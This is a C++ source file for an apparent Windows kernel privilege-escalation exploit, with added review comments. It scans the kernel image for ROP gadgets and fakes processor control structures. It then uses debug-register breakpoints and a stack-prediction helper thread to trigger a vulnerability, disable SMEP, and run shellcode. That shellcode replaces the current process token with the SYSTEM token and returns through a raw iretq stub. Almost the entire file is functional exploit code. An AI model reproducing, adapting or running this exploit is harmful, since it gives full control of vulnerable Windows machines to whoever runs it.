#include <iostream>
#include <Windows.h>
#include <intrin.h>
#include "KernelRoutines.h"
#include "LockedMemory.h"
#include "Native.h"
#include "Error.h"
#include "Exploit.h"

// View of four consecutive 64-bit stack slots that KernelShellcode overlays on
// kernel stack addresses in order to inspect (CS, RIP) and patch (RIP) a trap
// frame. The field order matches the stack dump quoted inside KernelShellcode
// (return address, code selector, flags, stack pointer).
struct ISR_STACK
{
	uint64_t RIP;	// Return instruction pointer of the frame
	uint64_t CS;	// Code segment selector (KernelShellcode tests for 0x10 and 0x33)
	uint64_t EF;	// Saved flags value (not read anywhere in this file)
	uint64_t RSP;	// Saved stack pointer (not read anywhere in this file)
};

// Doesn't really change: offsets and values that are hard-coded rather than
// pattern-scanned. They are used by PrivEsc to populate the user-mode buffers
// named Pcr / Prcb / KThread, and by KernelShellcode to read values back.
static const uint32_t Offset_Pcr__Self = 0x18;               // Pcr slot that receives the address of Pcr itself
static const uint32_t Offset_Pcr__CurrentPrcb = 0x20;        // Pcr slot that receives the address of Prcb
static const uint32_t Offset_Pcr__Prcb = 0x180;              // Prcb is located at Pcr + this offset
static const uint32_t Offset_Prcb__CurrentThread = 0x8;      // Prcb slot that receives the KThread buffer address
static const uint32_t Offset_Context__XMM13 = 0x270;         // Subtracted from the predicted return slot so the XMM13 field of the context lands on it
static const uint32_t MxCsr__DefVal = 0x1F80;                // Value stored in the first DWORD of Prcb
static const uint32_t Offset_Prcb__RspBase = 0x28;           // Prcb slot that PrivEsc sets to 1
static const uint32_t Offset_KThread__InitialStack = 0x28;   // KThread slot that PrivEsc sets to 0
static const uint32_t Offset_Prcb__Cr8 = 0x100 + 0xA0;       // Prcb slot watched through DR1 in PrivEsc
static const uint32_t Offset_Prcb__Cr4 = 0x100 + 0x18;       // Prcb slot KernelShellcode reads to obtain the CR4 value it later restores

// Requires patterns: these start at 0 and are filled in by PrivEsc, which
// scans the first 0x50 bytes of the named exported routine for a byte pattern
// and reads a 32-bit displacement out of it. PrivEsc asserts both are non-zero.
NON_PAGED_DATA static uint32_t Offset_Prcb__Context = 0x0;                   // @KeBugCheckEx
NON_PAGED_DATA static uint32_t Offset_KThread__ApcStateFill__Process = 0x0;  // @PsGetCurrentProcess

// Scratch area of ten 64-bit slots. Its address is handed to __triggervuln in
// PrivEsc and later to IRetToVulnStub (as its third argument) by KernelShellcode.
// NOTE(review): the exact contents are defined by __triggervuln, which is not
// visible in this file.
NON_PAGED_DATA uint64_t ContextBackup[10];

// Addresses of kernel exports, resolved in PrivEsc through
// KrCtx->GetProcAddress and called/dereferenced only from KernelShellcode.
// All start out as 0 until PrivEsc assigns them.
NON_PAGED_DATA fnFreeCall k_PsDereferencePrimaryToken = 0;
NON_PAGED_DATA fnFreeCall k_PsReferencePrimaryToken = 0;
NON_PAGED_DATA fnFreeCall k_PsGetCurrentProcess = 0;
NON_PAGED_DATA uint64_t* k_PsInitialSystemProcess = 0;	// Pointer to a variable, not a function: KernelShellcode dereferences it

// Called by KernelShellcode as k_ExAllocatePool(0, size) to obtain memory for IRetToVulnStub.
NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0;

// Signature used to call a copy of IRetToVulnStub. Per the per-instruction
// comments below, the stub consumes its arguments from rcx, rdx and r8:
//   Cr4           - value written to CR4
//   IsrStack      - value loaded into RSP immediately before iretq
//   ContextBackup - moved into rcx so it is live when iretq transfers control
using fnIRetToVulnStub = void(*)(uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup);

// Raw machine code for the return stub. KernelShellcode copies these bytes
// into memory obtained from k_ExAllocatePool and calls the copy; the stub
// never returns to its caller because it ends in iretq on the supplied stack.
NON_PAGED_DATA BYTE IRetToVulnStub[] =
{
	0x0F, 0x22, 0xE1,		// mov cr4, rcx ; cr4 = original cr4
	0x48, 0x89, 0xD4,		// mov rsp, rdx ; stack = isr stack
	0x4C, 0x89, 0xC1,		// mov rcx, r8  ; rcx = ContextBackup
	0xFB,				// sti          ; enable interrupts
	0x48, 0x31, 0xC0,               // xor rax, rax ; rax = 0, used to lower IRQL to PASSIVE_LEVEL
	0x44, 0x0F, 0x22, 0xC0,         // mov cr8, rax ; cr8 = 0
	0x48, 0xCF			// iretq        ; interrupt return using the frame at rsp
};

// Both values are computed by the helper thread created in PrivEsc and read
// by KernelShellcode to locate the trap frames on the kernel stack.
NON_PAGED_DATA uint64_t PredictedNextRsp = 0;	// Last observed Ctx->Rsp plus StackDelta
NON_PAGED_DATA ptrdiff_t StackDelta = 0;	// Difference between two successively observed Ctx->Rsp values

// Payload whose address PrivEsc stages as the final entry of its gadget chain.
// In order, the visible steps are:
//   1. Clear DR7 and rewrite CR4 with bit 20 cleared, remembering the
//      original CR4 value read from the Prcb area through GS.
//   2. swapgs, then walk trap frames on the kernel stack starting from the
//      position derived from PredictedNextRsp / StackDelta.
//   3. Copy IRetToVulnStub into memory returned by k_ExAllocatePool.
//   4. Replace the current process's primary token reference with the one of
//      the process pointed to by PsInitialSystemProcess.
//   5. swapgs back, advance the saved RIP of the selected frame by one byte,
//      and transfer control to the stub, which restores CR4 and executes iretq.
// This function does not return normally; step 5 leaves through the stub.
// Statement order matters throughout (GS swaps and control-register writes).
NON_PAGED_CODE void KernelShellcode()
{
	// Disable all hardware breakpoints that PrivEsc armed through DR7.
	__writedr(7, 0);

	// Read the CR4 value stored at Prcb + Offset_Prcb__Cr4 via GS, then run with
	// bit 20 cleared (CR4.SMEP in the Intel SDM). Cr4Old is restored by the stub.
	// NOTE(review): this read happens before the swapgs below, so GS is presumably
	// still the user-supplied Pcr set by __set_gs_base in PrivEsc - confirm.
	uint64_t Cr4Old = __readgsqword(Offset_Pcr__Prcb + Offset_Prcb__Cr4);
	__writecr4(Cr4Old & ~(1 << 20));

	__swapgs();

	// Uncomment if it bugchecks to debug:
	// __writedr( 2, StackDelta );
	// __writedr( 3, PredictedNextRsp );
	// __debugbreak();
	// ^ This will let you see StackDelta and RSP clearly in a crash dump so you can check where the process went bad

	// Starting point for the frame walk, one StackDelta step (plus 0x38 bytes)
	// before the predicted stack pointer.
	uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38;

	// Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault
	// Continue while the frame looks like a kernel-mode one: CS == 0x10 and RIP
	// above 0x7FFFFFFEFFFF.
	while (
		((ISR_STACK*)IsrStackIterator)->CS == 0x10 &&
		((ISR_STACK*)IsrStackIterator)->RIP > 0x7FFFFFFEFFFF)
	{

		// NOTE(review): __rollback_isr is defined outside this file; its effect on
		// the frame is not visible here.
		__rollback_isr(IsrStackIterator);

		// We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta
		// Detected by a user-mode code selector (0x33) in the frame 0x30 bytes further on.
		if (((ISR_STACK*)(IsrStackIterator + 0x30))->CS == 0x33)
		{
			/*
			fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap
			fffff00e`d7a1bc40 0000000000000010
			fffff00e`d7a1bc48 0000000000000002
			fffff00e`d7a1bc50 fffff00ed7a1bc68
			fffff00e`d7a1bc58 0000000000000000
			fffff00e`d7a1bc60 0000000000000014
			fffff00e`d7a1bc68 00007ff7e2261e95 --
			fffff00e`d7a1bc70 0000000000000033
			fffff00e`d7a1bc78 0000000000000202
			fffff00e`d7a1bc80 000000ad39b6f938
			*/
			// Select the user-mode frame (the one marked "--" above) and stop walking.
			IsrStackIterator = IsrStackIterator + 0x30;
			break;
		}

		// Otherwise step to the next frame, StackDelta bytes away.
		IsrStackIterator -= StackDelta;
	}


	// Copy the return stub into memory from k_ExAllocatePool (first argument 0).
	// The allocation result is not checked before it is written to.
	PVOID KStub = (PVOID)k_ExAllocatePool(0ull, (uint64_t)sizeof(IRetToVulnStub));
	Np_memcpy(KStub, IRetToVulnStub, sizeof(IRetToVulnStub));

	// ------ KERNEL CODE ------

	uint64_t SystemProcess = *k_PsInitialSystemProcess;
	uint64_t CurrentProcess = k_PsGetCurrentProcess();

	uint64_t CurrentToken = k_PsReferencePrimaryToken(CurrentProcess);
	uint64_t SystemToken = k_PsReferencePrimaryToken(SystemProcess);

	// Scan the first 0x500 bytes of the current process object, 8 bytes at a
	// time, for the slot whose value (ignoring the low 4 bits) equals the
	// current token, and overwrite that slot with the system token.
	for (int i = 0; i < 0x500; i += 0x8)
	{
		uint64_t Member = *(uint64_t *)(CurrentProcess + i);

		if ((Member & ~0xF) == CurrentToken)
		{
			*(uint64_t *)(CurrentProcess + i) = SystemToken;
			break;
		}
	}


	// Balance the two references taken above.
	k_PsDereferencePrimaryToken(CurrentToken);
	k_PsDereferencePrimaryToken(SystemToken);

	// ------ KERNEL CODE ------

	__swapgs();

	// Resume one byte past the saved RIP of the selected frame.
	// NOTE(review): presumably skips a one-byte instruction inside __triggervuln - confirm.
	((ISR_STACK*)IsrStackIterator)->RIP += 1;
	// Hand over to the stub: restores CR4 to Cr4Old, switches RSP to the frame, iretq.
	(fnIRetToVulnStub(KStub))(Cr4Old, IsrStackIterator, ContextBackup);
}

// Allocates Sz bytes of committed, read/write memory, zero-fills it, and calls
// Np_TryLockPage on the start of every 0x1000-byte page in the range.
//
// Sz      - number of bytes to allocate.
// Returns - base address of the allocation, or NULL when VirtualAlloc fails
//           (previously a failed allocation was passed straight to ZeroMemory).
//
// The result of each Np_TryLockPage call is intentionally left unchecked, as
// in the original implementation. The memory is never freed by this function.
PUCHAR AllocateLockedMemoryForKernel(SIZE_T Sz)
{
	PUCHAR Va = (PUCHAR)VirtualAlloc(0, Sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (!Va)
		return NULL;

	// Writing to the whole range also touches every page before it is locked.
	ZeroMemory(Va, Sz);

	// SIZE_T index: the former signed int was compared against an unsigned
	// SIZE_T and would overflow for sizes above INT_MAX.
	for (SIZE_T Offset = 0; Offset < Sz; Offset += 0x1000)
		Np_TryLockPage(Va + Offset);

	return Va;
}

// User-mode driver routine. In order, it:
//   1. Checks the KVA shadow query result and locks code/data pages.
//   2. Allocates the Pcr / KThread / KProcess buffers and locates three
//      instruction sequences plus two structure offsets in the mapped kernel
//      image (KrCtx->NtLib).
//   3. Fills in the buffers, starts a helper thread that derives StackDelta
//      and PredictedNextRsp, and resolves the kernel routine addresses.
//   4. Arms DR0/DR1 breakpoints, stages six 64-bit values in XMM13-XMM15,
//      swaps the GS base to Pcr and calls __triggervuln.
// Every precondition is enforced with assert; nothing is returned.
// Statement order is significant (see the Sleep comment below).
void PrivEsc()
{
	// Pre-init checks: KVA Shadow
	// Only evaluated when the query returns 0; asserts that the enabled flag is clear.
	SYSTEM_KERNEL_VA_SHADOW_INFORMATION KvaInfo = { 0 };
	if (!NtQuerySystemInformation(SystemKernelVaShadowInformation, &KvaInfo, (uint64_t) sizeof(KvaInfo), 0ull))
		assert(!KvaInfo.KvaShadowFlags.KvaShadowEnabled);

	// Initialization: Memory allocation, locking sections, loading nt

	assert(Np_LockSections());
	assert(Np_TryLockPage(&__rollback_isr));
	assert(Np_TryLockPage(&__swapgs));

	KernelContext* KrCtx = Kr_InitContext();
	assert(KrCtx);

	// Function-local statics so the capture-less thread lambda below can use Prcb.
	static PUCHAR Pcr = AllocateLockedMemoryForKernel(0x10000);
	static PUCHAR KThread = AllocateLockedMemoryForKernel(0x10000);
	static PUCHAR KProcess = AllocateLockedMemoryForKernel(0x10000);
	static PUCHAR Prcb = Pcr + Offset_Pcr__Prcb;


	// Offsets: Finding offsets and ROP gadgets

	// Walk the PE headers of the mapped image to the section named ".text".
	// The search has no upper bound on the number of sections examined.
	PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)KrCtx->NtLib;
	PIMAGE_NT_HEADERS FileHeader = (PIMAGE_NT_HEADERS)((uint64_t)DosHeader + DosHeader->e_lfanew);
	PIMAGE_SECTION_HEADER SectionHeader = (PIMAGE_SECTION_HEADER)(((uint64_t)&FileHeader->OptionalHeader) + FileHeader->FileHeader.SizeOfOptionalHeader);
	while (_strcmpi((char*)SectionHeader->Name, ".text")) SectionHeader++;

	uint64_t AdrRetn = 0;
	uint64_t AdrPopRcxRetn = 0;
	uint64_t AdrSetCr4Retn = 0;

	PUCHAR NtBegin = (PUCHAR)KrCtx->NtLib + SectionHeader->VirtualAddress;
	PUCHAR NtEnd = NtBegin + SectionHeader->Misc.VirtualSize;

	// Each scan takes the first match in the section and converts the local
	// pointer to an address relative to KrCtx->NtBase.

	// Find [RETN]
	for (PUCHAR It = NtBegin; It < NtEnd; It++)
	{
		if (It[0] == 0xC3)
		{
			AdrRetn = It - (PUCHAR)KrCtx->NtLib + KrCtx->NtBase;
			break;
		}
	}

	// Find [POP RCX; RETN]
	// Note: It[1] is read without checking it against NtEnd.
	for (PUCHAR It = NtBegin; It < NtEnd; It++)
	{
		if (It[0] == 0x59 && It[1] == 0xC3)
		{
			AdrPopRcxRetn = It - (PUCHAR)KrCtx->NtLib + KrCtx->NtBase;
			break;
		}
	}

	// Find [MOV CR4, RCX; RETN]
	// Note: It[1]..It[3] are read without checking them against NtEnd.
	for (PUCHAR It = NtBegin; It < NtEnd; It++)
	{
		if (It[0] == 0x0F && It[1] == 0x22 &&
			It[2] == 0xE1 && It[3] == 0xC3)
		{
			AdrSetCr4Retn = It - (PUCHAR)KrCtx->NtLib + KrCtx->NtBase;
			break;
		}
	}

	assert(AdrRetn);
	assert(AdrPopRcxRetn);
	assert(AdrSetCr4Retn);

	PUCHAR UPsGetCurrentProcess = (PUCHAR)GetProcAddress(KrCtx->NtLib, "PsGetCurrentProcess");
	PUCHAR UKeBugCheckEx = (PUCHAR)GetProcAddress(KrCtx->NtLib, "KeBugCheckEx");

	// Within the first 0x50 bytes of KeBugCheckEx, find bytes 48 8B followed
	// five bytes later by E8, and take the 32-bit value at +3 as the offset.
	for (int i = 0; i < 0x50; i++)
	{
		if (UKeBugCheckEx[i] == 0x48 && UKeBugCheckEx[i + 1] == 0x8B &&  // mov rax, 
			UKeBugCheckEx[i + 7] == 0xE8)                             // call
		{
			Offset_Prcb__Context = *(int32_t *)(UKeBugCheckEx + i + 3);
			break;
		}
	}

	// Same approach for PsGetCurrentProcess, with C3 as the trailing byte.
	for (int i = 0; i < 0x50; i++)
	{
		if (UPsGetCurrentProcess[i] == 0x48 && UPsGetCurrentProcess[i + 1] == 0x8B &&  // mov rax, 
			UPsGetCurrentProcess[i + 7] == 0xC3)                                    // retn
		{
			Offset_KThread__ApcStateFill__Process = *(int32_t *)(UPsGetCurrentProcess + i + 3);
			break;
		}
	}

	assert(Offset_Prcb__Context);
	assert(Offset_KThread__ApcStateFill__Process);

	// Populate the user-mode Pcr / Prcb / KThread buffers.
	*(PVOID*)(Pcr + Offset_Pcr__Self) = Pcr;				// Pcr.Self
	*(PVOID*)(Pcr + Offset_Pcr__CurrentPrcb) = Pcr + Offset_Pcr__Prcb;	// Pcr.CurrentPrcb
	*(DWORD*)(Prcb) = MxCsr__DefVal;		// Prcb.MxCsr
	*(PVOID*)(Prcb + Offset_Prcb__CurrentThread) = KThread;			// Prcb.CurrentThread
	*(PVOID*)(Prcb + Offset_Prcb__Context) = Prcb + 0x3000;		// Prcb.Context, Placeholder
	*(PVOID*)(KThread + Offset_KThread__ApcStateFill__Process) = KProcess;			// EThread.ApcStateFill.EProcess
	*(PVOID*)(Prcb + Offset_Prcb__RspBase) = (PVOID)1;			// Prcb.RspBase
	*(PVOID*)(KThread + Offset_KThread__InitialStack) = 0;				// EThread.InitialStack

	// Copy of the current SS selector; its address is watched through DR0 below
	// and passed to __triggervuln.
	NON_PAGED_DATA static DWORD SavedSS = __readss();

	// Execute Exploit!

	// Helper thread: polls the context structure that Prcb.Context points at.
	// Note that `volatile PCONTEXT` qualifies the pointer itself, not the CONTEXT it points to.
	HANDLE ThreadHandle = CreateThread(0, 0, [](LPVOID) -> DWORD
	{
		volatile PCONTEXT Ctx = *(volatile PCONTEXT*)(Prcb + Offset_Prcb__Context);

		while (!Ctx->Rsp);						// Wait for RtlCaptureContext to be called once so we get leaked RSP
		uint64_t StackInitial = Ctx->Rsp;
		while (Ctx->Rsp == StackInitial);				// Wait for it to be called another time so we get the stack pointer difference 
		// between sequential KiDebugTrapOrFault's
		StackDelta = Ctx->Rsp - StackInitial;
		PredictedNextRsp = Ctx->Rsp + StackDelta;			// Predict next RSP value when RtlCaptureContext is called
		uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8;		// Predict where the return pointer will be located at
		NextRetPtrStorage &= ~0xF;					// Round down to a 16-byte boundary
		*(uint64_t*)(Prcb + Offset_Prcb__Context) = NextRetPtrStorage - Offset_Context__XMM13;
		// Make RtlCaptureContext write XMM13-XMM15 over it
		return 0;
	}, 0, 0, 0);

	assert(ThreadHandle);

	// Helper thread: highest priority, affinity mask 0xFFFFFFFE (bit 0 clear).
	// Current thread (HANDLE(-2) is the current-thread pseudo-handle value): mask 0x1.
	// The affinity calls are not checked, and ThreadHandle is never closed.
	assert(SetThreadPriority(ThreadHandle, THREAD_PRIORITY_TIME_CRITICAL));
	SetThreadAffinityMask(ThreadHandle, 0xFFFFFFFE);
	SetThreadAffinityMask(HANDLE(-2), 0x00000001);

	// Resolve the kernel addresses used by KernelShellcode.
	k_ExAllocatePool = KrCtx->GetProcAddress<>("ExAllocatePool");
	k_PsReferencePrimaryToken = KrCtx->GetProcAddress<>("PsReferencePrimaryToken");
	k_PsDereferencePrimaryToken = KrCtx->GetProcAddress<>("PsDereferencePrimaryToken");
	k_PsGetCurrentProcess = KrCtx->GetProcAddress<>("PsGetCurrentProcess");
	k_PsInitialSystemProcess = KrCtx->GetProcAddress<uint64_t*>("PsInitialSystemProcess");

	//Force proper execution order?  If you leave this out, the computer can BSoD.
	Sleep(1000);

	// DR7 fields used below (Intel SDM debug-register layout): bit 0 / bit 2 are
	// the local-enable bits for DR0 / DR1; bits 16-17 and 20-21 are their R/W
	// fields (3 = break on read or write); bits 18-19 and 22-23 are their LEN
	// fields (3 = 4 bytes, 2 = 8 bytes).
	CONTEXT Ctx = { 0 };
	Ctx.Dr0 = (uint64_t)&SavedSS;                        	// Trap SS
	Ctx.Dr1 = (uint64_t)Prcb + Offset_Prcb__Cr8;         	// Trap KiSaveProcessorControlState, Cr8 storage
	Ctx.Dr7 =
		(1 << 0) | (3 << 16) | (3 << 18) |	// DR0: R/W, 4 Bytes, Active
		(1 << 2) | (3 << 20) | (2 << 22);		// DR1: R/W, 8 Bytes, Active
	Ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;

	assert(SetThreadContext(HANDLE(-2), &Ctx));

	// Three 16-byte pairs, one per XMM register. 0x506f8 is the value that ends
	// up in RCX for the mov cr4 gadget; bit 20 is clear in it.
	uint64_t RetnRetn[2] = { AdrRetn, AdrRetn };
	uint64_t PopRcxRetnRcx[2] = { AdrPopRcxRetn, 0x506f8 };
	uint64_t SetCr4Retn[2] = { AdrSetCr4Retn, (uint64_t)&KernelShellcode };

	// RSP:
	__setxmm13((BYTE*)RetnRetn);		// &retn	// we need to align xmm writes so two place holders just incase!
	// &retn
	__setxmm14((BYTE*)PopRcxRetnRcx);		// &pop rcx
	// 0x506f8
	__setxmm15((BYTE*)SetCr4Retn);		// &mov cr4, rcx; retn
	// &KernelShellcode

	// Point GS at the prepared Pcr only for the duration of the trigger, then restore it.
	PVOID ProperGsBase = __read_gs_base();
	__set_gs_base(Pcr);
	__triggervuln(ContextBackup, &SavedSS); // Let the fun begin
	__set_gs_base(ProperGsBase);
	return;
}
